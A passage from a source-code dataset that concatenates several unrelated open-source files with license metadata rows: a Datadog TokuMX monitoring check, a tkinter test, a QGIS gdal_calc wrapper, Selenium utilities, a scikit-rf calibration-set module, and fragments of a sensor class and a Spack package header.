        self.gain = 1.0 / 1000  # was float(1 / 1000), which is 0.0 under Python 2 integer division
self.gain_plus = 0
self.gaslevel = 0
def read_sensor(self):
self.gaslevel = mcp.readAnalog()
return self.gaslevel
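# Minimal polling sketch (editor's illustration):
#
#   sensor = Mq135Sensor()
#   level = sensor.read_sensor()   # raw MCP3002 ADC reading for the gas level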
| mit | 3,128,231,726,398,340,000 | 37.7 | 79 | 0.732558 | false |
cberry777/dd-agent | checks.d/tokumx.py | 5 | 18952 | # (C) Datadog, Inc. 2014-2016
# (C) Leif Walsh <[email protected]> 2014
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
# stdlib
import time
import types
# 3p
import bson
from pymongo import (
MongoClient,
ReadPreference,
uri_parser,
version as py_version,
)
# project
from checks import AgentCheck
DEFAULT_TIMEOUT = 10
class LocalRate:
"""To be used for metrics that should be sent as rates but that we want to send as histograms"""
def __init__(self, agent_check, metric_name, tags):
self.agent_check = agent_check
self.metric_name = metric_name
self.tags = tags
self.prev_val = None
self.cur_val = None
self.prev_ts = None
self.cur_ts = None
def submit_histogram(self):
value = float(self.cur_val - self.prev_val)/float(self.cur_ts - self.prev_ts)
self.agent_check.histogram(self.metric_name, value=value, tags=self.tags)
def submit(self, val):
if self.prev_val is None:
self.prev_val = val
self.prev_ts = time.time()
elif self.cur_val is None:
self.cur_val = val
self.cur_ts = time.time()
self.submit_histogram()
else:
self.prev_val = self.cur_val
self.prev_ts = self.cur_ts
self.cur_val = val
self.cur_ts = time.time()
self.submit_histogram()
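# Illustrative use of LocalRate (editor's sketch; the check instance and tags
# are placeholders). From the second call onward, submit() turns the raw
# counter into a per-second delta and records it as a histogram point:
#
#   rate = LocalRate(check, 'tokumx.statsd.idx.queries', tags=['db:test'])
#   rate.submit(100)   # first call only primes prev_val / prev_ts
#   rate.submit(160)   # emits (160 - 100) / elapsed_seconds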
class TokuMX(AgentCheck):
SERVICE_CHECK_NAME = 'tokumx.can_connect'
GAUGES = [
"indexCounters.btree.missRatio",
"globalLock.ratio",
"connections.current",
"connections.available",
"mem.resident",
"mem.virtual",
"mem.mapped",
"cursors.totalOpen",
"cursors.timedOut",
"uptime",
"stats.indexes",
"stats.indexSize",
"stats.objects",
"stats.dataSize",
"stats.storageSize",
"replSet.health",
"replSet.state",
"replSet.replicationLag",
"metrics.repl.buffer.count",
"metrics.repl.buffer.maxSizeBytes",
"metrics.repl.buffer.sizeBytes",
"ft.cachetable.size.current",
"ft.cachetable.size.writing",
"ft.cachetable.size.limit",
"ft.locktree.size.current",
"ft.locktree.size.limit",
"ft.compressionRatio.leaf",
"ft.compressionRatio.nonleaf",
"ft.compressionRatio.overall",
"ft.checkpoint.lastComplete.time",
"ft.alerts.locktreeRequestsPending",
"ft.alerts.checkpointFailures",
]
RATES = [
"indexCounters.btree.accesses",
"indexCounters.btree.hits",
"indexCounters.btree.misses",
"opcounters.insert",
"opcounters.query",
"opcounters.update",
"opcounters.delete",
"opcounters.getmore",
"opcounters.command",
"opcountersRepl.insert",
"opcountersRepl.query",
"opcountersRepl.update",
"opcountersRepl.delete",
"opcountersRepl.getmore",
"opcountersRepl.command",
"asserts.regular",
"asserts.warning",
"asserts.msg",
"asserts.user",
"asserts.rollovers",
"metrics.document.deleted",
"metrics.document.inserted",
"metrics.document.returned",
"metrics.document.updated",
"metrics.getLastError.wtime.num",
"metrics.getLastError.wtime.totalMillis",
"metrics.getLastError.wtimeouts",
"metrics.operation.fastmod",
"metrics.operation.idhack",
"metrics.operation.scanAndOrder",
"metrics.queryExecutor.scanned",
"metrics.record.moves",
"metrics.repl.apply.batches.num",
"metrics.repl.apply.batches.totalMillis",
"metrics.repl.apply.ops",
"metrics.repl.network.bytes",
"metrics.repl.network.getmores.num",
"metrics.repl.network.getmores.totalMillis",
"metrics.repl.network.ops",
"metrics.repl.network.readersCreated",
"metrics.repl.oplog.insert.num",
"metrics.repl.oplog.insert.totalMillis",
"metrics.repl.oplog.insertBytes",
"metrics.ttl.deletedDocuments",
"metrics.ttl.passes",
"ft.fsync.count",
"ft.fsync.time",
"ft.log.count",
"ft.log.time",
"ft.log.bytes",
"ft.cachetable.miss.count",
"ft.cachetable.miss.time",
"ft.cachetable.miss.full.count",
"ft.cachetable.miss.full.time",
"ft.cachetable.miss.partial.count",
"ft.cachetable.miss.partial.time",
"ft.cachetable.evictions.partial.nonleaf.clean.count",
"ft.cachetable.evictions.partial.nonleaf.clean.bytes",
"ft.cachetable.evictions.partial.leaf.clean.count",
"ft.cachetable.evictions.partial.leaf.clean.bytes",
"ft.cachetable.evictions.full.nonleaf.clean.count",
"ft.cachetable.evictions.full.nonleaf.clean.bytes",
"ft.cachetable.evictions.full.nonleaf.dirty.count",
"ft.cachetable.evictions.full.nonleaf.dirty.bytes",
"ft.cachetable.evictions.full.nonleaf.dirty.time",
"ft.cachetable.evictions.full.leaf.clean.count",
"ft.cachetable.evictions.full.leaf.clean.bytes",
"ft.cachetable.evictions.full.leaf.dirty.count",
"ft.cachetable.evictions.full.leaf.dirty.bytes",
"ft.cachetable.evictions.full.leaf.dirty.time",
"ft.checkpoint.count",
"ft.checkpoint.time",
"ft.checkpoint.begin.time",
"ft.checkpoint.write.nonleaf.count",
"ft.checkpoint.write.nonleaf.time",
"ft.checkpoint.write.nonleaf.bytes.uncompressed",
"ft.checkpoint.write.nonleaf.bytes.compressed",
"ft.checkpoint.write.leaf.count",
"ft.checkpoint.write.leaf.time",
"ft.checkpoint.write.leaf.bytes.uncompressed",
"ft.checkpoint.write.leaf.bytes.compressed",
"ft.serializeTime.nonleaf.serialize",
"ft.serializeTime.nonleaf.compress",
"ft.serializeTime.nonleaf.decompress",
"ft.serializeTime.nonleaf.deserialize",
"ft.serializeTime.leaf.serialize",
"ft.serializeTime.leaf.compress",
"ft.serializeTime.leaf.decompress",
"ft.serializeTime.leaf.deserialize",
"ft.alerts.longWaitEvents.logBufferWait",
"ft.alerts.longWaitEvents.fsync.count",
"ft.alerts.longWaitEvents.fsync.time",
"ft.alerts.longWaitEvents.cachePressure.count",
"ft.alerts.longWaitEvents.cachePressure.time",
"ft.alerts.longWaitEvents.checkpointBegin.count",
"ft.alerts.longWaitEvents.checkpointBegin.time",
"ft.alerts.longWaitEvents.locktreeWait.count",
"ft.alerts.longWaitEvents.locktreeWait.time",
"ft.alerts.longWaitEvents.locktreeWaitEscalation.count",
"ft.alerts.longWaitEvents.locktreeWaitEscalation.time",
]
METRICS = GAUGES + RATES
def __init__(self, name, init_config, agentConfig, instances=None):
AgentCheck.__init__(self, name, init_config, agentConfig, instances)
self._last_state_by_server = {}
self.idx_rates = {}
def get_library_versions(self):
return {"pymongo": py_version}
def check_last_state(self, state, server, agentConfig):
if self._last_state_by_server.get(server, -1) != state:
self._last_state_by_server[server] = state
return self.create_event(state, server, agentConfig)
def create_event(self, state, server, agentConfig):
"""Create an event with a message describing the replication
state of a mongo node"""
def get_state_description(state):
if state == 0:
return 'Starting Up'
elif state == 1:
return 'Primary'
elif state == 2:
return 'Secondary'
elif state == 3:
return 'Recovering'
elif state == 4:
return 'Fatal'
elif state == 5:
return 'Starting up (initial sync)'
elif state == 6:
return 'Unknown'
elif state == 7:
return 'Arbiter'
elif state == 8:
return 'Down'
elif state == 9:
return 'Rollback'
status = get_state_description(state)
msg_title = "%s is %s" % (server, status)
msg = "TokuMX %s just reported as %s" % (server, status)
self.event({
'timestamp': int(time.time()),
'event_type': 'tokumx',
'msg_title': msg_title,
'msg_text': msg,
'host': self.hostname
})
def _get_ssl_params(self, instance):
ssl_params = {
'ssl': instance.get('ssl', None),
'ssl_keyfile': instance.get('ssl_keyfile', None),
'ssl_certfile': instance.get('ssl_certfile', None),
'ssl_cert_reqs': instance.get('ssl_cert_reqs', None),
'ssl_ca_certs': instance.get('ssl_ca_certs', None)
}
for key, param in ssl_params.items():
if param is None:
del ssl_params[key]
return ssl_params
def _get_connection(self, instance, read_preference=None):
if 'server' not in instance:
raise Exception("Missing 'server' in tokumx config")
server = instance['server']
ssl_params = self._get_ssl_params(instance)
tags = instance.get('tags', [])
tags.append('server:%s' % server)
# de-dupe tags to avoid a memory leak
tags = list(set(tags))
        # The server is configured as a URL: mongodb://user:pass@server/db
parsed = uri_parser.parse_uri(server)
username = parsed.get('username')
password = parsed.get('password')
db_name = parsed.get('database')
if not db_name:
self.log.info('No TokuMX database found in URI. Defaulting to admin.')
db_name = 'admin'
service_check_tags = [
"db:%s" % db_name
]
nodelist = parsed.get('nodelist')
if nodelist:
host = nodelist[0][0]
port = nodelist[0][1]
service_check_tags = service_check_tags + [
"host:%s" % host,
"port:%s" % port
]
do_auth = True
if username is None or password is None:
self.log.debug("TokuMX: cannot extract username and password from config %s" % server)
do_auth = False
try:
if read_preference:
conn = MongoClient(server,
socketTimeoutMS=DEFAULT_TIMEOUT*1000,
read_preference=ReadPreference.SECONDARY,
**ssl_params)
else:
conn = MongoClient(server, socketTimeoutMS=DEFAULT_TIMEOUT*1000, **ssl_params)
db = conn[db_name]
except Exception:
self.service_check(self.SERVICE_CHECK_NAME, AgentCheck.CRITICAL, tags=service_check_tags)
raise
if do_auth:
if not db.authenticate(username, password):
message = "TokuMX: cannot connect with config %s" % server
self.service_check(self.SERVICE_CHECK_NAME, AgentCheck.CRITICAL, tags=service_check_tags, message=message)
raise Exception(message)
self.service_check(self.SERVICE_CHECK_NAME, AgentCheck.OK, tags=service_check_tags)
return server, conn, db, tags
def _get_replica_metrics(self, instance, conn, db, tags, server, status):
try:
data = {}
replSet = conn['admin'].command('replSetGetStatus')
if replSet:
primary = None
current = None
# find nodes: master and current node (ourself)
for member in replSet.get('members'):
if member.get('self'):
current = member
if int(member.get('state')) == 1:
primary = member
# If we have both we can compute a lag time
if current is not None and primary is not None:
lag = primary['optimeDate'] - current['optimeDate']
                    # Python 2.7 has this built in; Python < 2.7 doesn't...
if hasattr(lag,'total_seconds'):
data['replicationLag'] = lag.total_seconds()
else:
data['replicationLag'] = (
lag.microseconds +
(lag.seconds + lag.days * 24 * 3600) * 10**6
) / 10.0**6
if current is not None:
data['health'] = current['health']
tags.append('replset:%s' % replSet['set'])
tags.append('replstate:%s' % current['stateStr'])
if current['stateStr'] == 'PRIMARY':
tags.append('role:primary')
else:
tags.append('role:secondary')
self.log.debug("Current replSet member is secondary. "
"Creating new connection to set read_preference to secondary.")
# need a new connection to deal with replica sets
server, conn, db, _ = self._get_connection(instance, read_preference=ReadPreference.SECONDARY)
data['state'] = replSet['myState']
self.check_last_state(data['state'], server, self.agentConfig)
status['replSet'] = data
except Exception as e:
if "OperationFailure" in repr(e) and "replSetGetStatus" in str(e):
pass
else:
raise e
return conn, db
def submit_idx_rate(self, metric_name, value, tags, key):
if key not in self.idx_rates:
local_rate = LocalRate(self, metric_name, tags)
self.idx_rates[key] = local_rate
else:
local_rate = self.idx_rates[key]
local_rate.submit(value)
def collect_mongos(self, server, conn, db, tags):
tags.append('role:mongos')
config = conn['config']
agg_result = config['chunks'].aggregate([{'$group': {'_id': {'ns': '$ns', 'shard': '$shard'}, 'count': {'$sum': 1}}}])
if agg_result['ok']:
for doc in agg_result['result']:
chunk_tags = list(tags)
parts = doc['_id']['ns'].split('.', 1)
chunk_tags.append('db:%s' % parts[0])
chunk_tags.append('coll:%s' % parts[1])
chunk_tags.append('shard:%s' % doc['_id']['shard'])
shard_doc = config['shards'].find_one(doc['_id']['shard'])
host_parts = shard_doc['host'].split('/', 1)
if len(host_parts) == 2:
chunk_tags.append('replset:%s' % host_parts[0])
self.gauge('tokumx.sharding.chunks', doc['count'], tags=chunk_tags)
def collect_metrics(self, instance, server, conn, db, tags):
status = db["$cmd"].find_one({"serverStatus": 1})
status['stats'] = db.command('dbstats')
# Handle replica data, if any
# See http://www.mongodb.org/display/DOCS/Replica+Set+Commands#ReplicaSetCommands-replSetGetStatus
conn, db = self._get_replica_metrics(instance, conn, db, tags, server, status)
for dbname in conn.database_names():
db_tags = list(tags)
db_tags.append('db:%s' % dbname)
db = conn[dbname]
stats = db.command('dbstats')
for m, v in stats.items():
if m in ['db', 'ok']:
continue
m = 'stats.db.%s' % m
m = self.normalize(m, 'tokumx')
# FIXME: here tokumx.stats.db.* are potentially unbounded
self.gauge(m, v, db_tags)
for collname in db.collection_names(False):
stats = db.command('collStats', collname)
for m, v in stats.items():
if m in ['db', 'ok']:
continue
if m == 'indexDetails':
for idx_stats in v:
for k in ['count', 'size', 'avgObjSize', 'storageSize']:
value = idx_stats[k]
if type(value) in (types.IntType, types.LongType, types.FloatType):
self.histogram('tokumx.stats.idx.%s' % k, idx_stats[k], tags=db_tags)
for k in ['queries', 'nscanned', 'nscannedObjects', 'inserts', 'deletes']:
key = (dbname, collname, idx_stats['name'], k)
self.submit_idx_rate('tokumx.statsd.idx.%s' % k, idx_stats[k], tags=db_tags, key=key)
# FIXME: here tokumx.stats.coll.* are potentially unbounded
elif type(v) in (types.IntType, types.LongType, types.FloatType):
self.histogram('tokumx.stats.coll.%s' % m, v, db_tags)
# If these keys exist, remove them for now as they cannot be serialized
try:
status['backgroundFlushing'].pop('last_finished')
except KeyError:
pass
try:
status.pop('localTime')
except KeyError:
pass
# Go through the metrics and save the values
for m in self.METRICS:
# each metric is of the form: x.y.z with z optional
# and can be found at status[x][y][z]
value = status
try:
for c in m.split("."):
value = value[c]
except KeyError:
continue
# value is now status[x][y][z]
if type(value) == bson.int64.Int64:
value = long(value)
else:
if type(value) not in (types.IntType, types.LongType, types.FloatType):
self.log.warning("Value found that is not of type int, int64,long, or float")
# Check if metric is a gauge or rate
if m in self.GAUGES:
self.gauge('tokumx.%s' % m, value, tags=tags)
if m in self.RATES:
self.rate('tokumx.%sps' % m, value, tags=tags)
def check(self, instance):
server, conn, db, tags = self._get_connection(instance)
if conn.is_mongos:
self.collect_mongos(server, conn, db, tags)
else:
self.collect_metrics(instance, server, conn, db, tags)
| bsd-3-clause | 8,902,282,012,258,382,000 | 37.209677 | 126 | 0.543267 | false |
paweljasinski/ironpython3 | Src/StdLib/Lib/tkinter/test/test_tkinter/test_loadtk.py | 162 | 1503 | import os
import sys
import unittest
import test.support as test_support
from tkinter import Tcl, TclError
test_support.requires('gui')
class TkLoadTest(unittest.TestCase):
@unittest.skipIf('DISPLAY' not in os.environ, 'No $DISPLAY set.')
def testLoadTk(self):
tcl = Tcl()
self.assertRaises(TclError,tcl.winfo_geometry)
tcl.loadtk()
self.assertEqual('1x1+0+0', tcl.winfo_geometry())
tcl.destroy()
def testLoadTkFailure(self):
old_display = None
if sys.platform.startswith(('win', 'darwin', 'cygwin')):
# no failure possible on windows?
# XXX Maybe on tk older than 8.4.13 it would be possible,
# see tkinter.h.
return
with test_support.EnvironmentVarGuard() as env:
if 'DISPLAY' in os.environ:
del env['DISPLAY']
# on some platforms, deleting environment variables
# doesn't actually carry through to the process level
# because they don't support unsetenv
# If that's the case, abort.
with os.popen('echo $DISPLAY') as pipe:
display = pipe.read().strip()
if display:
return
tcl = Tcl()
self.assertRaises(TclError, tcl.winfo_geometry)
self.assertRaises(TclError, tcl.loadtk)
tests_gui = (TkLoadTest, )
if __name__ == "__main__":
test_support.run_unittest(*tests_gui)
| apache-2.0 | -4,996,065,968,263,876,000 | 31.673913 | 69 | 0.582169 | false |
CS-SI/QGIS | python/plugins/processing/algs/gdal/gdalcalc.py | 7 | 7588 | # -*- coding: utf-8 -*-
"""
***************************************************************************
gdalcalc.py
---------------------
    Date                 : January 2015
Copyright : (C) 2015 by Giovanni Manghi
Email : giovanni dot manghi at naturalgis dot pt
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Giovanni Manghi'
__date__ = 'January 2015'
__copyright__ = '(C) 2015, Giovanni Manghi'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
from processing.algs.gdal.GdalAlgorithm import GdalAlgorithm
from processing.algs.gdal.GdalUtils import GdalUtils
# The parameter/output classes used below are missing from this copy of the
# file; restore the imports they need:
from processing.core.parameters import (ParameterRaster,
                                        ParameterString,
                                        ParameterSelection)
from processing.core.outputs import OutputRaster
from processing.tools.system import isWindows
class gdalcalc(GdalAlgorithm):
INPUT_A = 'INPUT_A'
INPUT_B = 'INPUT_B'
INPUT_C = 'INPUT_C'
INPUT_D = 'INPUT_D'
INPUT_E = 'INPUT_E'
INPUT_F = 'INPUT_F'
BAND_A = 'BAND_A'
BAND_B = 'BAND_B'
BAND_C = 'BAND_C'
BAND_D = 'BAND_D'
BAND_E = 'BAND_E'
BAND_F = 'BAND_F'
FORMULA = 'FORMULA'
OUTPUT = 'OUTPUT'
NO_DATA = 'NO_DATA'
EXTRA = 'EXTRA'
RTYPE = 'RTYPE'
TYPE = ['Byte', 'Int16', 'UInt16', 'UInt32', 'Int32', 'Float32', 'Float64']
#DEBUG = 'DEBUG'
def __init__(self):
super().__init__()
def initAlgorithm(self, config=None):
self.addParameter(ParameterRaster(
self.INPUT_A, self.tr('Input layer A'), False))
self.addParameter(ParameterString(self.BAND_A,
self.tr('Number of raster band for raster A'), '1', optional=True))
self.addParameter(ParameterRaster(
self.INPUT_B, self.tr('Input layer B'), True))
self.addParameter(ParameterString(self.BAND_B,
self.tr('Number of raster band for raster B'), '1', optional=True))
self.addParameter(ParameterRaster(
self.INPUT_C, self.tr('Input layer C'), True))
self.addParameter(ParameterString(self.BAND_C,
self.tr('Number of raster band for raster C'), '1', optional=True))
self.addParameter(ParameterRaster(
self.INPUT_D, self.tr('Input layer D'), True))
self.addParameter(ParameterString(self.BAND_D,
self.tr('Number of raster band for raster D'), '1', optional=True))
self.addParameter(ParameterRaster(
self.INPUT_E, self.tr('Input layer E'), True))
self.addParameter(ParameterString(self.BAND_E,
self.tr('Number of raster band for raster E'), '1', optional=True))
self.addParameter(ParameterRaster(
self.INPUT_F, self.tr('Input layer F'), True))
self.addParameter(ParameterString(self.BAND_F,
self.tr('Number of raster band for raster F'), '1', optional=True))
self.addParameter(ParameterString(self.FORMULA,
self.tr('Calculation in gdalnumeric syntax using +-/* or any numpy array functions (i.e. logical_and())'), 'A*2', optional=False))
self.addParameter(ParameterString(self.NO_DATA,
self.tr('Set output nodata value'), '', optional=True))
self.addParameter(ParameterSelection(self.RTYPE,
self.tr('Output raster type'), self.TYPE, 5))
#self.addParameter(ParameterBoolean(
# self.DEBUG, self.tr('Print debugging information'), False))
self.addParameter(ParameterString(self.EXTRA,
self.tr('Additional creation parameters'), '', optional=True))
self.addOutput(OutputRaster(self.OUTPUT, self.tr('Calculated')))
def name(self):
return 'rastercalculator'
def displayName(self):
return self.tr('Raster calculator')
def group(self):
return self.tr('Raster miscellaneous')
def groupId(self):
return 'rastermiscellaneous'
def getConsoleCommands(self, parameters, context, feedback, executing=True):
out = self.getOutputValue(self.OUTPUT)
extra = self.getParameterValue(self.EXTRA)
if extra is not None:
extra = str(extra)
#debug = self.getParameterValue(self.DEBUG)
formula = self.getParameterValue(self.FORMULA)
noData = self.getParameterValue(self.NO_DATA)
if noData is not None:
noData = str(noData)
arguments = []
arguments.append('--calc')
arguments.append('"' + formula + '"')
arguments.append('--format')
arguments.append(GdalUtils.getFormatShortNameFromFilename(out))
arguments.append('--type')
arguments.append(self.TYPE[self.getParameterValue(self.RTYPE)])
if noData and len(noData) > 0:
arguments.append('--NoDataValue')
arguments.append(noData)
if extra and len(extra) > 0:
arguments.append(extra)
#if debug:
# arguments.append('--debug')
arguments.append('-A')
arguments.append(self.getParameterValue(self.INPUT_A))
if self.getParameterValue(self.BAND_A):
arguments.append('--A_band ' + self.getParameterValue(self.BAND_A))
if self.getParameterValue(self.INPUT_B):
arguments.append('-B')
arguments.append(self.getParameterValue(self.INPUT_B))
if self.getParameterValue(self.BAND_B):
arguments.append('--B_band ' + self.getParameterValue(self.BAND_B))
if self.getParameterValue(self.INPUT_C):
arguments.append('-C')
arguments.append(self.getParameterValue(self.INPUT_C))
if self.getParameterValue(self.BAND_C):
arguments.append('--C_band ' + self.getParameterValue(self.BAND_C))
if self.getParameterValue(self.INPUT_D):
arguments.append('-D')
arguments.append(self.getParameterValue(self.INPUT_D))
if self.getParameterValue(self.BAND_D):
arguments.append('--D_band ' + self.getParameterValue(self.BAND_D))
if self.getParameterValue(self.INPUT_E):
arguments.append('-E')
arguments.append(self.getParameterValue(self.INPUT_E))
if self.getParameterValue(self.BAND_E):
arguments.append('--E_band ' + self.getParameterValue(self.BAND_E))
if self.getParameterValue(self.INPUT_F):
arguments.append('-F')
arguments.append(self.getParameterValue(self.INPUT_F))
if self.getParameterValue(self.BAND_F):
arguments.append('--F_band ' + self.getParameterValue(self.BAND_F))
arguments.append('--outfile')
arguments.append(out)
if isWindows():
return ['gdal_calc', GdalUtils.escapeAndJoin(arguments)]
else:
return ['gdal_calc.py', GdalUtils.escapeAndJoin(arguments)]
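# For reference (editor's note), a typical command line assembled above is:
#   gdal_calc.py --calc "A*2" --format GTiff --type Float32 \
#       -A input.tif --A_band 1 --outfile out.tif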
| gpl-2.0 | 7,289,643,383,815,380,000 | 44.166667 | 172 | 0.56049 | false |
dorotan/pythontraining | env/Lib/site-packages/selenium/webdriver/common/utils.py | 3 | 4191 | # Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
The Utils methods.
"""
import socket
from selenium.webdriver.common.keys import Keys
try:
basestring
except NameError:
# Python 3
basestring = str
def free_port():
"""
Determines a free port using sockets.
"""
free_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
free_socket.bind(('0.0.0.0', 0))
free_socket.listen(5)
port = free_socket.getsockname()[1]
free_socket.close()
return port
def find_connectable_ip(host, port=None):
"""Resolve a hostname to an IP, preferring IPv4 addresses.
We prefer IPv4 so that we don't change behavior from previous IPv4-only
implementations, and because some drivers (e.g., FirefoxDriver) do not
support IPv6 connections.
If the optional port number is provided, only IPs that listen on the given
port are considered.
:Args:
- host - A hostname.
- port - Optional port number.
:Returns:
A single IP address, as a string. If any IPv4 address is found, one is
returned. Otherwise, if any IPv6 address is found, one is returned. If
neither, then None is returned.
"""
try:
addrinfos = socket.getaddrinfo(host, None)
except socket.gaierror:
return None
ip = None
for family, _, _, _, sockaddr in addrinfos:
connectable = True
if port:
connectable = is_connectable(port, sockaddr[0])
if connectable and family == socket.AF_INET:
return sockaddr[0]
if connectable and not ip and family == socket.AF_INET6:
ip = sockaddr[0]
return ip
def join_host_port(host, port):
"""Joins a hostname and port together.
This is a minimal implementation intended to cope with IPv6 literals. For
    example, join_host_port('::1', 80) == '[::1]:80'.
:Args:
- host - A hostname.
- port - An integer port.
"""
if ':' in host and not host.startswith('['):
return '[%s]:%d' % (host, port)
return '%s:%d' % (host, port)
def is_connectable(port, host="localhost"):
"""
Tries to connect to the server at port to see if it is running.
:Args:
- port: The port to connect.
"""
socket_ = None
try:
socket_ = socket.create_connection((host, port), 1)
result = True
except socket.error:
result = False
finally:
if socket_:
socket_.close()
return result
def is_url_connectable(port):
"""
Tries to connect to the HTTP server at /status path
and specified port to see if it responds successfully.
:Args:
- port: The port to connect.
"""
try:
from urllib import request as url_request
except ImportError:
import urllib2 as url_request
try:
res = url_request.urlopen("http://127.0.0.1:%s/status" % port)
        return res.getcode() == 200
    except Exception:
return False
def keys_to_typing(value):
"""Processes the values that will be typed in the element."""
typing = []
for val in value:
if isinstance(val, Keys):
typing.append(val)
elif isinstance(val, int):
val = str(val)
for i in range(len(val)):
typing.append(val[i])
else:
for i in range(len(val)):
typing.append(val[i])
return typing
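# Example (editor's note): keys_to_typing flattens mixed input into the
# individual characters WebDriver sends, e.g.
#
#   keys_to_typing(['ab', 12])  ->  ['a', 'b', '1', '2']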
| apache-2.0 | -346,764,154,843,182,900 | 26.572368 | 78 | 0.632307 | false |
kapari/django-oscar | src/oscar/apps/catalogue/receivers.py | 60 | 1249 | # -*- coding: utf-8 -*-
from django.conf import settings
if settings.OSCAR_DELETE_IMAGE_FILES:
from oscar.core.loading import get_model
from django.db import models
from django.db.models.signals import post_delete
from sorl import thumbnail
from sorl.thumbnail.helpers import ThumbnailError
ProductImage = get_model('catalogue', 'ProductImage')
Category = get_model('catalogue', 'Category')
def delete_image_files(sender, instance, **kwargs):
"""
Deletes the original image, created thumbnails, and any entries
in sorl's key-value store.
"""
image_fields = (models.ImageField, thumbnail.ImageField)
for field in instance._meta.fields:
if isinstance(field, image_fields):
# Make Django return ImageFieldFile instead of ImageField
fieldfile = getattr(instance, field.name)
try:
thumbnail.delete(fieldfile)
except ThumbnailError:
pass
# connect for all models with ImageFields - add as needed
models_with_images = [ProductImage, Category]
for sender in models_with_images:
post_delete.connect(delete_image_files, sender=sender)
| bsd-3-clause | 5,561,713,570,382,437,000 | 33.694444 | 73 | 0.647718 | false |
willhaines/scikit-rf | skrf/calibration/calibrationSet.py | 10 | 4426 |
'''
.. module:: skrf.calibration.calibrationSet
================================================================
calibrationSet (:mod:`skrf.calibration.calibrationSet`)
================================================================
Contains the CalibrationSet class, and supporting functions
CalibrationSet Class
===============
.. autosummary::
:toctree: generated/
CalibrationSet
'''
from itertools import product, combinations, permutations
from .calibration import Calibration
from ..networkSet import NetworkSet
def cartesian_product(ideals, measured_sets, *args, **kwargs):
    '''
    Return a list of Calibrations, one per element of the cartesian product
    of the measured sets.
    '''
measured_lists = product(*[k[:] for k in measured_sets])
return [Calibration(ideals = ideals, measured = measured,
*args, **kwargs) for measured in measured_lists ]
def dot_product(ideals, measured_sets, *args, **kwargs):
    '''
    Return a list of Calibrations formed by zipping the measured sets
    element-wise; all sets must be the same length.
    '''
for measured_set in measured_sets:
if len(measured_set) != len(measured_sets[0]):
raise(IndexError('all measured NetworkSets must have same length for dot product combinatoric function'))
cal_list = []
for k in list(range(len(measured_sets[0]))):
measured = [measured_set[k] for measured_set in measured_sets]
cal_list.append(
Calibration(ideals=ideals, measured= measured,
*args,**kwargs)
)
return cal_list
class CalibrationSet(object):
'''
A set of Calibrations
This is designed to support experimental uncertainty analysis [1]_.
References
-----------
.. [1] A. Arsenovic, L. Chen, M. F. Bauwens, H. Li, N. S. Barker, and R. M. Weikle, "An Experimental Technique for Calibration Uncertainty Analysis," IEEE Transactions on Microwave Theory and Techniques, vol. 61, no. 1, pp. 263-269, 2013.
'''
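    # Sketch of intended use (editor's illustration; OnePort and the network
    # variables are placeholders):
    #
    #   cset = Dot(OnePort, ideals=[short, open, load],
    #              measured_sets=[short_set, open_set, load_set])
    #   corrected = cset.apply_cal(dut_raw)   # NetworkSet, one ntwk per cal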
def __init__(self, cal_class, ideals, measured_sets,*args, **kwargs):
'''
Parameters
----------
cal_class : a Calibration class
this is the class of calibration to use on the set. This
argument is the actual class itself like OnePort, TRL, SOLT, etc
ideals : list of Networks
measured_set : list of NetworkSets, or list of lists
each element in this list should be a corresponding measured
set to the ideals element of the same index. The sets
themselves can be anything list-like
\\*args\\**kargs :
passed to self.run(),
'''
self.cal_class = cal_class
self.ideals = ideals
self.measured_sets = measured_sets
self.args = args
self.kwargs = kwargs
self.run(*args, **kwargs)
def __getitem__(self, key):
return self.cal_list[key]
def apply_cal(self, raw_ntwk, *args, **kwargs):
        '''
        Apply each calibration in the set to `raw_ntwk`, returning the
        corrected networks as a NetworkSet.
        '''
return NetworkSet([k.apply_cal(raw_ntwk) for k in self.cal_list],
*args, **kwargs)
def plot_uncertainty_per_standard(self):
        '''
        Plot the standard deviation of the s-parameter magnitude for each
        measured standard.
        '''
self.dankness('std_s','plot_s_mag')
def dankness(self, prop, func, *args, **kwargs):
        '''
        Call (or fetch) attribute `func` of property `prop` on each
        measured NetworkSet.
        '''
try:
[k.__getattribute__(prop).__getattribute__(func)\
(*args, **kwargs) for k in self.measured_sets]
except (TypeError):
return [k.__getattribute__(prop).__getattribute__(func) \
for k in self.measured_sets]
def run(self):
        raise NotImplementedError('SubClass must implement this')
@property
def corrected_sets(self):
'''
The set of corrected networks, each is corrected by its corresponding
element in the cal_list
'''
n_meas = len(self.cal_list[0].measured)
mat = [k.caled_ntwks for k in self.cal_list]
return [NetworkSet([k[l] for k in mat]) for l in range(n_meas)]
class Dot(CalibrationSet):
def run(self, *args, **kwargs):
ideals = self.ideals
measured_sets = self.measured_sets
if len(set(map(len, measured_sets))) !=1:
raise(IndexError('all measured NetworkSets must have same length for dot product combinatoric function'))
self.cal_list = []
for k in range(len(measured_sets[0])):
measured = [measured_set[k] for measured_set in measured_sets]
cal = self.cal_class(ideals=ideals, measured= measured,
*args,**kwargs)
self.cal_list.append(cal)
| bsd-3-clause | 6,811,641,914,329,456,000 | 29.524138 | 242 | 0.582241 | false |
matthiasdiener/spack | var/spack/repos/builtin/packages/nghttp2/package.py | 5 | 2319 | ##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
